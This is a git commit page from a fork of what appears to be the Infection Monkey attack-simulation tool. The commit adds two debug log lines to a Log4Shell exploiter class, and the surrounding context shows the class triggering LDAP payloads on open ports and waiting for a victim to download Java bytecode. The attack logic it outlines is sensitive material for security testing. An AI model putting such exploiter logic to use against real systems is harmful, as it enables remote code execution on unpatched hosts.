forked from p15670423/monkey
Agent: Add helpful debug logging to log4shell exploiter
This commit is contained in:
parent
d3c75200fd
commit
928192b9b0
|
@ -138,6 +138,10 @@ class Log4ShellExploiter(WebRCE):
|
||||||
# because we don't know which services are running and on which ports
|
# because we don't know which services are running and on which ports
|
||||||
for exploit in get_log4shell_service_exploiters():
|
for exploit in get_log4shell_service_exploiters():
|
||||||
for port in self._open_ports:
|
for port in self._open_ports:
|
||||||
|
logger.debug(
|
||||||
|
f'Attempting Log4Shell exploit on for service "{exploit.service_name}"'
|
||||||
|
f"on port {port}"
|
||||||
|
)
|
||||||
try:
|
try:
|
||||||
url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
|
url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
|
||||||
except Exception as ex:
|
except Exception as ex:
|
||||||
|
@ -175,6 +179,7 @@ class Log4ShellExploiter(WebRCE):
|
||||||
|
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
|
|
||||||
|
logger.debug("Timed out while waiting for victim to download the java bytecode")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def _wait_for_victim_to_download_agent(self):
|
def _wait_for_victim_to_download_agent(self):
|
||||||
|
|
Loading…
Reference in New Issue